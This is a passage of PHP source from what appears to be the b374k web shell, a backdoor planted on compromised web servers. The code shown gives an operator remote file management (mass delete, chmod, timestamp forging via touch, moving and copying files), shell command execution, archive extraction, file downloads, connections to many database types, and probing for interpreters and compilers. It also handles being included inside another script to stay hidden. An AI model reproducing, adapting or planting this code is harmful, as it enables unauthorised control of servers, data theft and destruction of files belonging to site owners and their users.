660. <label for='".md5($s_lhref)."' class='css-label'></label>
661. ";
662. }
663.  
664.  
665. else $s_cboxes = "~";
666. $s_ldl = str_replace("__dlpath__",$s_l,$s_arc);
667. $s_buff .= "
668. <tr>
669. <td style='text-align:center;text-indent:4px;'>".$s_cboxes."</td>
670. <td class='explorelist' title='".$s_lnametit."' ondblclick=\"return go('".addslashes($s_lhref)."',event);\">
671. <a href='".$s_lhref."' onclick='return false;'>".$s_lname."</a>
672. </td>
673. <td title='".$s_lsizetit."'>".$s_lsize."</td>
674. ".$s_owner_html."
675. <td style='text-align:center;'>".gp($s_l)."</td>
676. <td style='text-align:center;'>".@date("d-M-Y H:i:s",filemtime($s_l))."</td>
677. <td>".$s_laction."</td>
678. <td>".$s_ldl."</td></tr>";
679. }
680.  
681. $s_extract = "";$s_compress = "";
682. if(class_exists("ZipArchive")){
683. $s_extract .= "<option value='extractzip'>extract (zip)</option>
684. ";
685. $s_compress .= "<option value='compresszip'>compress (zip)</option>
686. ";
687. }
688. if($s_tar){
689. $s_extract .= "<option value='extracttar'>extract (tar)</option>
690. <option value='extracttargz'>extract (tar.gz)</option>
691. ";
692.  
693. $s_compress .="<option value='compresstar'>compress (tar)</option>
694. <option value='compresstargz'>compress (tar.gz)</option>";
695. }
696.  
697. $s_buff .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'>
698. <form action='".$s_self."' method='post'>
699. <input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' />
700. <label for='checkalll' class='css-label'></label>
701. </td><td>
702. <select id='massact' class='inputzbut' onchange='massactgo();' style='width:100%;height:20px;margin:0;'>
703. <option value='' disabled selected>Action</option>
704. <option value='cut'>cut</option>
705. <option value='copy'>copy</option>
706. <option value='paste'>paste</option>
707. <option value='delete'>delete</option>
708. <option value='' disabled>-</option>
709. <option value='chmod'>chmod</option>
710. <option value='touch'>touch</option>
711. <option value='' disabled>-</option>
712. ".$s_compress.$s_extract."
713. </select>
714. </td><td colspan='".$s_colspan."' style='text-align:left;'><noscript><input type='button' value='Go !' class='inputzbut' onclick='massactgo();' /></noscript>Total : ".$s_total_file." files, ".$s_total_dir." Directories</td>
715. </form>
716. </td>
717. </tr></tfoot>
718. </table>
719. ";
720. return $s_buff;
721. }
722. //database related functions
723. function sql_connect($s_sqltype, $s_sqlhost, $s_sqluser, $s_sqlpass){
724. if($s_sqltype == 'mysql'){if(function_exists('mysql_connect')) return @mysql_connect($s_sqlhost,$s_sqluser,$s_sqlpass);}
725. elseif($s_sqltype == 'mssql'){
726. if(function_exists('mssql_connect')) return @mssql_connect($s_sqlhost,$s_sqluser,$s_sqlpass);
727. elseif(function_exists('sqlsrv_connect')){
728. $s_coninfo = array("UID"=>$s_sqluser, "PWD"=>$s_sqlpass);
729. return @sqlsrv_connect($s_sqlhost,$s_coninfo);
730. }
731. }
732. elseif($s_sqltype == 'pgsql'){
733. $s_hosts = explode(":", $s_sqlhost);
734. if(count($s_hosts)==2){
735. $s_host_str = "host=".$s_hosts[0]." port=".$s_hosts[1];
736. }
737. else $s_host_str = "host=".$s_sqlhost;
738. if(function_exists('pg_connect')) return @pg_connect("$s_host_str user=$s_sqluser password=$s_sqlpass");
739. }
740. elseif($s_sqltype == 'oracle'){if(function_exists('oci_connect')) return @oci_connect($s_sqluser,$s_sqlpass,$s_sqlhost);}
741. elseif($s_sqltype == 'sqlite3'){
742. if(class_exists('SQLite3')) if(!empty($s_sqlhost)) return new SQLite3($s_sqlhost);
743. else return false;
744. }
745. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_open')) return @sqlite_open($s_sqlhost);}
746. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_connect')) return @odbc_connect($s_sqlhost,$s_sqluser,$s_sqlpass);}
747. elseif($s_sqltype == 'pdo'){
748. if(class_exists('PDO')) if(!empty($s_sqlhost)) return new PDO($s_sqlhost,$s_sqluser,$s_sqlpass);
749. else return false;
750. }
751. }
752. function sql_query($s_sqltype, $s_query, $s_con){
753. if($s_sqltype == 'mysql'){if(function_exists('mysql_query')) return mysql_query($s_query);}
754. elseif($s_sqltype == 'mssql'){
755. if(function_exists('mssql_query')) return mssql_query($s_query);
756. elseif(function_exists('sqlsrv_query')) return sqlsrv_query($s_con,$s_query);
757. }
758. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_query')) return pg_query($s_query);}
759. elseif($s_sqltype == 'oracle'){
760. if(function_exists('oci_parse') && function_exists('oci_execute')){
761. $s_st = oci_parse($s_con, $s_query);
762. oci_execute($s_st);
763. return $s_st;
764. }
765. }
766. elseif($s_sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $s_con->query($s_query);}
767. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_query')) return sqlite_query($s_con, $s_query);}
768. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_exec')) return odbc_exec($s_con, $s_query);}
769. elseif($s_sqltype == 'pdo'){if(class_exists('PDO')) return $s_con->query($s_query);}
770. }
771. function sql_num_fields($s_sqltype, $s_hasil){
772. if($s_sqltype == 'mysql'){if(function_exists('mysql_num_fields')) return mysql_num_fields($s_hasil);}
773. elseif($s_sqltype == 'mssql'){
774. if(function_exists('mssql_num_fields')) return mssql_num_fields($s_hasil);
775. elseif(function_exists('sqlsrv_num_fields')) return sqlsrv_num_fields($s_hasil);
776. }
777. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_num_fields')) return pg_num_fields($s_hasil);}
778. elseif($s_sqltype == 'oracle'){if(function_exists('oci_num_fields')) return oci_num_fields($s_hasil);}
779. elseif($s_sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $s_hasil->numColumns();}
780. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_num_fields')) return sqlite_num_fields($s_hasil);}
781. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_num_fields')) return odbc_num_fields($s_hasil);}
782. elseif($s_sqltype == 'pdo'){if(class_exists('PDO')) return $s_hasil->columnCount();}
783. }
784. function sql_field_name($s_sqltype,$s_hasil,$s_i){
785. if($s_sqltype == 'mysql'){if(function_exists('mysql_field_name')) return mysql_field_name($s_hasil,$s_i);}
786. elseif($s_sqltype == 'mssql'){
787. if(function_exists('mssql_field_name')) return mssql_field_name($s_hasil,$s_i);
788. elseif(function_exists('sqlsrv_field_metadata')){
789. $s_metadata = sqlsrv_field_metadata($s_hasil);
790. if(is_array($s_metadata)){
791. $s_metadata=$s_metadata[$s_i];
792. }
793. if(is_array($s_metadata)) return $s_metadata['Name'];
794. }
795. }
796. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_field_name')) return pg_field_name($s_hasil,$s_i);}
797. elseif($s_sqltype == 'oracle'){if(function_exists('oci_field_name')) return oci_field_name($s_hasil,$s_i+1);}
798. elseif($s_sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $s_hasil->columnName($s_i);}
799. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_field_name')) return sqlite_field_name($s_hasil,$s_i);}
800. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_field_name')) return odbc_field_name($s_hasil,$s_i+1);}
801. elseif($s_sqltype == 'pdo'){
802. if(class_exists('PDO')){
803. $s_res = $s_hasil->getColumnMeta($s_i);
804. return $s_res['name'];
805. }
806. }
807. }
808. function sql_fetch_data($s_sqltype,$s_hasil){
809. if($s_sqltype == 'mysql'){if(function_exists('mysql_fetch_row')) return mysql_fetch_row($s_hasil);}
810. elseif($s_sqltype == 'mssql'){
811. if(function_exists('mssql_fetch_row')) return mssql_fetch_row($s_hasil);
812. elseif(function_exists('sqlsrv_fetch_array')) return sqlsrv_fetch_array($s_hasil,1);
813. }
814. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_fetch_row')) return pg_fetch_row($s_hasil);}
815. elseif($s_sqltype == 'oracle'){if(function_exists('oci_fetch_row')) return oci_fetch_row($s_hasil);}
816. elseif($s_sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $s_hasil->fetchArray(1);}
817. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_fetch_array')) return sqlite_fetch_array($s_hasil,1);}
818. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_fetch_array')) return odbc_fetch_array($s_hasil);}
819. elseif($s_sqltype == 'pdo'){if(class_exists('PDO')) return $s_hasil->fetch(2);}
820. }
821. function sql_num_rows($s_sqltype,$s_hasil){
822. if($s_sqltype == 'mysql'){if(function_exists('mysql_num_rows')) return mysql_num_rows($s_hasil);}
823. elseif($s_sqltype == 'mssql'){
824. if(function_exists('mssql_num_rows')) return mssql_num_rows($s_hasil);
825. elseif(function_exists('sqlsrv_num_rows')) return sqlsrv_num_rows($s_hasil);
826. }
827. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_num_rows')) return pg_num_rows($s_hasil);}
828. elseif($s_sqltype == 'oracle'){if(function_exists('oci_num_rows')) return oci_num_rows($s_hasil);}
829. elseif($s_sqltype == 'sqlite3'){
830. if(class_exists('SQLite3')){
831. $s_metadata = $s_hasil->fetchArray();
832. if(is_array($s_metadata)) return $s_metadata['count'];
833. }
834. }
835. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_num_rows')) return sqlite_num_rows($s_hasil);}
836. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_num_rows')) return odbc_num_rows($s_hasil);}
837. elseif($s_sqltype == 'pdo'){if(class_exists('PDO')) return $s_hasil->rowCount();}
838. }
839. function sql_close($s_sqltype,$s_con){
840. if($s_sqltype == 'mysql'){if(function_exists('mysql_close')) return mysql_close($s_con);}
841. elseif($s_sqltype == 'mssql'){
842. if(function_exists('mssql_close')) return mssql_close($s_con);
843. elseif(function_exists('sqlsrv_close')) return sqlsrv_close($s_con);
844. }
845. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_close')) return pg_close($s_con);}
846. elseif($s_sqltype == 'oracle'){if(function_exists('oci_close')) return oci_close($s_con);}
847. elseif($s_sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $s_con->close();}
848. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_close')) return sqlite_close($s_con);}
849. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_close')) return odbc_close($s_con);}
850. elseif($s_sqltype == 'pdo'){if(class_exists('PDO')) return $s_con = null;}
851. }
852. if(!function_exists('str_split')){
853. function str_split($s_t,$s_s=1){
854. $s_a = array();
855. for($s_i=0;$s_i<strlen($s_t);){
856. $s_a[] = substr($s_t,$s_i,$s_s);
857. $s_i += $s_s;
858. }
859. return $s_a;
860. }
861. }
862.  
863. // appearance
864. $s_theme = "dark";
865. if(isset($_COOKIE['theme'])) $s_theme = $_COOKIE['theme'];
866. if(isset($_REQUEST['x']) && ($_REQUEST['x']=='switch')){
867. if(isset($_COOKIE['theme'])){
868. $s_theme = $_COOKIE['theme'];
869. }
870. if($s_theme=="bright") $s_theme = "dark";
871. else $s_theme = "bright";
872. setcookie("theme", $s_theme ,time() + $s_login_time);
873. }
874.  
875.  
876.  
877. $s_dark = array("#000000","#FFFFFF","#222222","#4C9CAF","#111111","#AAAAAA","#292929","#363636","#191919","#444444","#CCCCCC","#999999","#202020");
878. $s_bright = array("#FFFFFF","#000000","#DDDDDD","#B36350","#EEEEEE","#555555","#D6D6D6","#C9C9C9","#E6E6E6","#BBBBBB","#333333","#666666","#DFDFDF");
879. $s_highlight_dark = array("4C9CAF","888888", "87DF45", "EEEEEE" , "FF8000");
880. $s_highlight_bright = array("B36350","777777", "7820BA", "111111" , "007FFF");
881. $s_color = ($s_theme=="bright")? $s_bright:$s_dark;
882. $s_checkbox = ($s_theme=="bright")? $s_bright_cb:$s_dark_cb;
883.  
884.  
885.  
886. global $s_self;
887. $s_self = "?";
888.  
889. $s_cek1 = basename($_SERVER['SCRIPT_FILENAME']);
890. $s_cek2 = substr(basename(__FILE__),0,strlen($s_cek1));;
891.  
892. if(isset($_COOKIE['b374k_included'])){
893. if(strcmp($s_cek1,$s_cek2)!=0) $s_self = $_COOKIE['s_self'];
894. else{
895. $s_self = "?";
896. setcookie("b374k_included", "0" ,time() - $s_login_time);
897. setcookie("s_self", $s_self ,time() + $s_login_time);
898. }
899. }
900. else{
901. if(strcmp($s_cek1,$s_cek2)!=0){
902. if(!isset($_COOKIE['s_home'])){
903. $s_home = "?".$_SERVER["QUERY_STRING"]."&";
904. setcookie("s_home", $s_home ,time() + $s_login_time);
905. }
906. if(isset($s_home)) $s_self = $s_home;
907. elseif(isset($_COOKIE['s_home'])) $s_self = $_COOKIE['s_home'];
908. setcookie("b374k_included", "1" ,time() + $s_login_time);
909. setcookie("s_self", $s_self ,time() + $s_login_time);
910. }
911. else{
912. $s_self = "?";
913. setcookie("b374k_included", "0" ,time() - $s_login_time);
914. setcookie("s_self", $s_self ,time() + $s_login_time);
915. }
916. }
917.  
918. if($s_auth){
919. // server software
920. $s_software = getenv("SERVER_SOFTWARE");
921. // uname -a
922. $s_system = php_uname();
923. // check os
924. $s_win = (strtolower(substr($s_system,0,3)) == "win")? true : false;
925. // change working directory
926. if(isset($_REQUEST['cd'])){
927. $s_dd = ss($_REQUEST['cd']);
928. if(is_dir($s_dd)){
929. $s_cwd = cp($s_dd);
930. chdir($s_cwd);
931. setcookie("cwd", $s_cwd ,time() + $s_login_time);
932. }
933. }
934. else{
935. if(isset($_COOKIE['cwd'])){
936. $s_dd = ss($_COOKIE['cwd']);
937. if(is_dir($s_dd)){
938. $s_cwd = cp($s_dd);
939. chdir($s_cwd);
940. }
941. }
942. else $s_cwd = cp(getcwd());
943. }
944.  
945. if(!$s_win){
946. if(!$s_user = rp(exe("whoami"))) $s_user = "";
947. if(!$s_id = rp(exe("id"))) $s_id = "";
948. }
949. else {
950. $s_user = get_current_user();
951. $s_id = $s_user;
952. }
953.  
954. // prompt style..
955. $s_prompt = $s_user." &gt;";
956. // check for posix
957. $s_posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false;
958. // server ip
959. $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
960. // your ip ;-)
961. $s_my_ip = $_SERVER['REMOTE_ADDR'];
962. $s_result = "";
963.  
964. global $s_python, $s_perl, $s_ruby, $s_node, $s_gcc, $s_java, $s_tar;
965. // check python
966. if(isset($_COOKIE['s_python'])){$s_python = $_COOKIE['s_python'];}
967. else{
968. $s_python = check_access("python");
969. setcookie("s_python", $s_python ,time() + $s_login_time);
970. }
971. $s_python = ($s_python=="1")?true:false;
972.  
973. // check perl
974. if(isset($_COOKIE['s_perl'])){$s_perl = $_COOKIE['s_perl'];}
975. else{
976. $s_perl = check_access("perl");
977. setcookie("s_perl", $s_perl ,time() + $s_login_time);
978. }
979. $s_perl = ($s_perl=="1")?true:false;
980.  
981. // check ruby
982. if(isset($_COOKIE['s_ruby'])){$s_ruby = $_COOKIE['s_ruby'];}
983. else{
984. $s_ruby = check_access("ruby");
985. setcookie("s_ruby", $s_ruby ,time() + $s_login_time);
986. }
987. $s_ruby = ($s_ruby=="1")?true:false;
988.  
989. // check nodejs
990. if(isset($_COOKIE['s_node'])){$s_node = $_COOKIE['s_node'];}
991. else{
992. $s_node = check_access("node");
993. setcookie("s_node", $s_node ,time() + $s_login_time);
994. }
995. $s_node = ($s_node=="1")?true:false;
996.  
997. // check gcc
998. if(isset($_COOKIE['s_gcc'])){$s_gcc = $_COOKIE['s_gcc'];}
999. else{
1000. $s_gcc = check_access("gcc");
1001. setcookie("s_gcc", $s_gcc ,time() + $s_login_time);
1002. }
1003. $s_gcc = ($s_gcc=="1")?true:false;
1004.  
1005. // check java
1006. if(isset($_COOKIE['s_java'])){$s_java = $_COOKIE['s_java'];}
1007. else{
1008. $s_java = check_access("java");
1009. setcookie("s_java", $s_java ,time() + $s_login_time);
1010. }
1011. $s_java = ($s_java=="1")?true:false;
1012.  
1013. // check tar
1014. if(isset($_COOKIE['s_tar'])){$s_tar = $_COOKIE['s_tar'];}
1015. else{
1016. $s_tar = check_access("tar");
1017. setcookie("s_tar", $s_tar ,time() + $s_login_time);
1018. }
1019. $s_tar = ($s_tar=="1")?true:false;
1020.  
1021. if(!empty($_REQUEST['dltype']) && !empty($_REQUEST['dlpath'])){
1022. $s_dltype = ss($_REQUEST['dltype']);
1023. $s_dlpath = ss($_REQUEST['dlpath']);
1024.  
1025. $s_dlname = basename($s_dlpath);
1026. if($s_dlpath==".") $s_dlname=basename($s_cwd);
1027. elseif($s_dlpath==".."){
1028. chdir("..");
1029. $s_dlname=basename(getcwd());
1030. chdir($s_cwd);
1031. }
1032. $s_tmpdir = get_writabledir();
1033. $s_dlarchive = $s_tmpdir.$s_dlname;
1034. $s_dlthis = "";
1035. if($s_dltype=="ziparchive"){
1036. $s_dlarchive .= ".zip";
1037. if(zip($s_dlpath,$s_dlarchive)){
1038. $s_dlthis = $s_dlarchive;
1039. }
1040. }
1041. elseif($s_dltype=="tar"){
1042. $s_dlarchive .= ".tar";
1043. $s_dlarchive = str_replace('\\', '/', $s_dlarchive);
1044. exe("tar cf ".$s_dlarchive." ".$s_dlpath);
1045. $s_dlthis = $s_dlarchive;
1046. }
1047. elseif($s_dltype=="targz"){
1048. $s_dlarchive .= ".tar.gz";
1049. $s_dlarchive = str_replace('\\', '/', $s_dlarchive);
1050. exe("tar czf ".$s_dlarchive." ".$s_dlpath);
1051. $s_dlthis = $s_dlarchive;
1052. }
1053. elseif($s_dltype=="raw"){
1054. if(is_file($s_dlpath)) $s_dlthis = $s_dlpath;
1055. }
1056.  
1057. if(is_file($s_dlthis)){
1058. header("Content-Type: application/octet-stream");
1059. header('Content-Transfer-Encoding: binary');
1060. header("Content-length: ".@filesize($s_dlthis));
1061. header("Content-disposition: attachment; filename=\"".basename($s_dlthis)."\";");
1062. $s_file = @fopen($s_dlthis,"rb");
1063. while(!feof($s_file)){
1064. print(@fread($s_file, 1024*8));
1065. ob_flush();
1066. flush();
1067. }
1068. fclose($s_file);
1069.  
1070. if($s_dltype!="raw"){
1071. //rename($s_dlthis,$s_dlthis."del");
1072. //unlink($s_dlthis."del");
1073. }
1074. exit;
1075. }
1076. }
1077. // massact
1078. if(isset($_REQUEST['y'])){
1079. $s_massact = $_COOKIE['massact'];
1080. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
1081. $s_lists = explode("|", $s_buffer);
1082. if(!empty($s_buffer)){
1083. if($_REQUEST['y']=='delete'){
1084. $s_result .= "<p class='notif'>Delete ? <a href='".$s_self."y=delok' onclick='return false;'>Yes</a> | <a href='".$s_self."' onclick='return false;'>No</a></p>";
1085. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
1086. }
1087. elseif($_REQUEST['y']=='chmod'){
1088. $s_result .= "<div class='notif'>chmod ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='0755' name='chmodok' style='width:30px;text-align:center;' maxlength='4' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
1089. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
1090. }
1091. elseif($_REQUEST['y']=='touch'){
1092. $s_result .= "<div class='notif'>touch ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".date("d-M-Y H:i:s",time())."' name='touchok' style='width:130px;text-align:center;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
1093. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
1094. }
1095. elseif($_REQUEST['y']=='extractzip'){
1096. $s_result .= "<div class='notif'>extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd."' name='extractzipok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
1097. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
1098. }
1099. elseif($_REQUEST['y']=='extracttar'){
1100. $s_result .= "<div class='notif'>extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd."' name='extracttarok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
1101. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
1102. }
1103. elseif($_REQUEST['y']=='extracttargz'){
1104. $s_result .= "<div class='notif'>extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd."' name='extracttargzok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
1105. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
1106. }
1107. elseif($_REQUEST['y']=='compresszip'){
1108. $s_result .= "<div class='notif'>compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd.substr(md5(time()),0,8).".zip' name='compresszipok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
1109. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
1110. }
1111. elseif($_REQUEST['y']=='compresstar'){
1112. $s_result .= "<div class='notif'>compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd.substr(md5(time()),0,8).".tar' name='compresstarok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
1113. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
1114. }
1115. elseif($_REQUEST['y']=='compresstargz'){
1116. $s_result .= "<div class='notif'>compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd.substr(md5(time()),0,8).".tar.gz' name='compresstargzok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
1117. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
1118. }
1119. elseif($_REQUEST['y']=='paste' && $s_massact=='cut'){
1120. $s_result .= "<p class='notif'>Move here ? <a href='".$s_self."y=moveok' onclick='return false;'>Yes</a> | <a href='".$s_self."' onclick='return false;'>No</a></p>";
1121. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
1122. }
1123. elseif($_REQUEST['y']=='paste' && $s_massact=='copy'){
1124. $s_result .= "<p class='notif'>Copy here ? <a href='".$s_self."y=copyok' onclick='return false;'>Yes</a> | <a href='".$s_self."' onclick='return false;'>No</a></p>";
1125. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
1126. }
1127. }
1128. }
1129.  
1130. if(isset($_REQUEST['y'])){
1131. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
1132. $s_lists = explode("|", $s_buffer);
1133. $s_counter = 0;
1134. if($_REQUEST['y']=='moveok'){
1135. foreach($s_lists as $s_l){
1136. if(rename($s_l,$s_cwd.basename($s_l))) $s_counter++;
1137. }
1138. if($s_counter>0) $s_result .= "<p class='notif'>".$s_counter." files/folders moved</p>";
1139. else $s_result .= "<p class='notif'>no files/folders moved</p>";
1140. setcookie("buffer", "" ,time() - $s_login_time);
1141. setcookie("massact", "" ,time() - $s_login_time);
1142. }
1143. if($_REQUEST['y']=='copyok'){
1144. foreach($s_lists as $s_l){
1145. if(copy($s_l,$s_cwd.basename($s_l))) $s_counter++;
1146. }
1147. if($s_counter>0) $s_result .= "<p class='notif'>".$s_counter." files/folders copied</p>";
1148. else $s_result .= "<p class='notif'>no files/folders copied</p>";
1149. setcookie("buffer", "" ,time() - $s_login_time);
1150. setcookie("massact", "" ,time() - $s_login_time);
1151. }
1152. if($_REQUEST['y']=='delok'){
1153. foreach($s_lists as $s_l){
1154. if(is_file($s_l)){
1155. if(unlink($s_l)) $s_counter++;
1156. }
1157. elseif(is_dir($s_l)){
1158. rmdirs($s_l);
1159. if(!is_dir($s_l)) $s_counter++;
1160. }
1161. }
1162. if($s_counter>0) $s_result .= "<p class='notif'>".$s_counter." files/folders deleted</p>";
1163. else $s_result .= "<p class='notif'>no files/folders deleted</p>";
1164. setcookie("buffer", "" ,time() - $s_login_time);
1165. setcookie("massact", "" ,time() - $s_login_time);
1166. }
1167. }
1168. elseif(isset($_REQUEST['chmodok'])){
1169. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
1170. $s_lists = explode("|", $s_buffer);
1171. $s_counter = 0;
1172. $s_mod = octdec($_REQUEST['chmodok']);
1173. foreach($s_lists as $s_l){
1174. if(chmod($s_l,$s_mod)) $s_counter++;
1175. }
1176. if($s_counter>0) $s_result .= "<p class='notif'>".$s_counter." files/folders changed mode to ".decoct($s_mod)."</p>";
1177. else $s_result .= "<p class='notif'>no files/folders modified</p>";
1178. setcookie("buffer", "" ,time() - $s_login_time);
1179. setcookie("massact", "" ,time() - $s_login_time);
1180. }
1181. elseif(isset($_REQUEST['touchok'])){
1182. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
1183. $s_lists = explode("|", $s_buffer);
1184. $s_counter = 0;
1185. $s_datenew = strtotime($_REQUEST['touchok']);
1186. foreach($s_lists as $s_l){
1187. if(touch($s_l,$s_datenew)) $s_counter++;
1188. }
1189. if($s_counter>0) $s_result .= "<p class='notif'>".$s_counter." files/folders changed access and modification time to ".date("d-M-Y H:i:s",$s_datenew)."</p>";
1190. else $s_result .= "<p class='notif'>no files/folders modified</p>";
1191. setcookie("buffer", "" ,time() - $s_login_time);
1192. setcookie("massact", "" ,time() - $s_login_time);
1193. }
1194. elseif(isset($_REQUEST['compresszipok'])){
1195. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
1196. $s_lists = explode("|", $s_buffer);
1197. $s_file = $_REQUEST['compresszipok'];
1198. if(zip($s_lists, $s_file)){
1199. $s_result .= "<p class='notif'>archive created : ".$s_file."</p>";
1200. }
1201. else $s_result .= "<p class='notif'>error creating archive file</p>";
1202. setcookie("buffer", "" ,time() - $s_login_time);
1203. setcookie("massact", "" ,time() - $s_login_time);
1204. }
1205. elseif(isset($_REQUEST['compresstarok'])){
1206. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
1207. $s_lists_ = explode("|", $s_buffer);
1208. $s_lists = array();
1209. $s_file = $_REQUEST['compresstarok'];
1210. $s_file = basename($s_file);
1211.  
1212. $s_lists__ = array_map("basename", $s_lists_);
1213. $s_lists = array_map("pf", $s_lists__);
1214. exe("tar cf \"".$s_file."\" ".implode(" ", $s_lists));
1215.  
1216. if(is_file($s_file)){
1217. $s_result .= "<p class='notif'>archive created : ".$s_file."</p>";
1218. }
1219. else $s_result .= "<p class='notif'>error creating archive file</p>";
1220. setcookie("buffer", "" ,time() - $s_login_time);
1221. setcookie("massact", "" ,time() - $s_login_time);
1222. }
1223. elseif(isset($_REQUEST['compresstargzok'])){
1224. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
1225. $s_lists_ = explode("|", $s_buffer);
1226. $s_lists = array();
1227. $s_file = $_REQUEST['compresstargzok'];
1228. $s_file = basename($s_file);
1229.  
1230. $s_lists__ = array_map("basename", $s_lists_);
1231. $s_lists = array_map("pf", $s_lists__);
1232. exe("tar czf \"".$s_file."\" ".implode(" ", $s_lists));
1233.  
1234. if(is_file($s_file)){
1235. $s_result .= "<p class='notif'>archive created : ".$s_file."</p>";
1236. }
1237. else $s_result .= "<p class='notif'>error creating archive file</p>";
1238. setcookie("buffer", "" ,time() - $s_login_time);
1239. setcookie("massact", "" ,time() - $s_login_time);
1240. }
1241. elseif(isset($_REQUEST['extractzipok'])){
1242. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
1243. $s_lists = explode("|", $s_buffer);
1244. $s_file = $_REQUEST['extractzipok'];
1245.  
1246. $zip = new ZipArchive();
1247. foreach($s_lists as $f){
1248. $s_target = $s_file.basename($f,".zip");
1249. if($zip->open($f)){
1250. if(!is_dir($s_target)) mkdir($s_target);
1251. if($zip->extractTo($s_target)){
1252. $s_result .= "<p class='notif'>files extracted to ".$s_target."</p>";
1253. }
1254. else $s_result .= "<p class='notif'>error extrating archive file</p>";
1255. $zip->close();
1256. }
1257. else $s_result .= "<p class='notif'>error opening archive file</p>";
1258. }
1259. setcookie("buffer", "" ,time() - $s_login_time);
1260. setcookie("massact", "" ,time() - $s_login_time);
1261. }
1262. elseif(isset($_REQUEST['extracttarok'])){
1263. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
1264. $s_lists = explode("|", $s_buffer);
1265. $s_file = $_REQUEST['extracttarok'];
1266.  
1267. foreach($s_lists as $f){
1268. $s_target = "";
1269. $s_target = basename($f,".tar");
1270. if(!is_dir($s_target)) mkdir($s_target);
1271. exe("tar xf \"".basename($f)."\" -C \"".$s_target."\"");
1272. }
1273. setcookie("buffer", "" ,time() - $s_login_time);
1274. setcookie("massact", "" ,time() - $s_login_time);
1275. }
1276. elseif(isset($_REQUEST['extracttargzok'])){
1277. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
1278. $s_lists = explode("|", $s_buffer);
1279. $s_file = $_REQUEST['extracttargzok'];
1280.  
1281. foreach($s_lists as $f){
1282. $s_target = "";
1283. if(strpos(strtolower($f), ".tar.gz")!==false) $s_target = basename($f,".tar.gz");
1284. elseif(strpos(strtolower($f), ".tgz")!==false) $s_target = basename($f,".tgz");
1285. if(!is_dir($s_target)) mkdir($s_target);
1286. exe("tar xzf \"".basename($f)."\" -C \"".$s_target."\"");
1287. }
1288. setcookie("buffer", "" ,time() - $s_login_time);
1289. setcookie("massact", "" ,time() - $s_login_time);
1290. }
1291.  
1292. // view image specified by ?img=<file>
1293. if(isset($_REQUEST['img'])){
1294. ob_clean();
1295. $s_d = ss($_REQUEST['d']);
1296. $s_f = ss($_REQUEST['img']);
1297. $s_inf = @getimagesize($s_d.$s_f);
1298. $s_ext = explode($s_f,".");
1299. $s_ext = $s_ext[count($s_ext)-1];
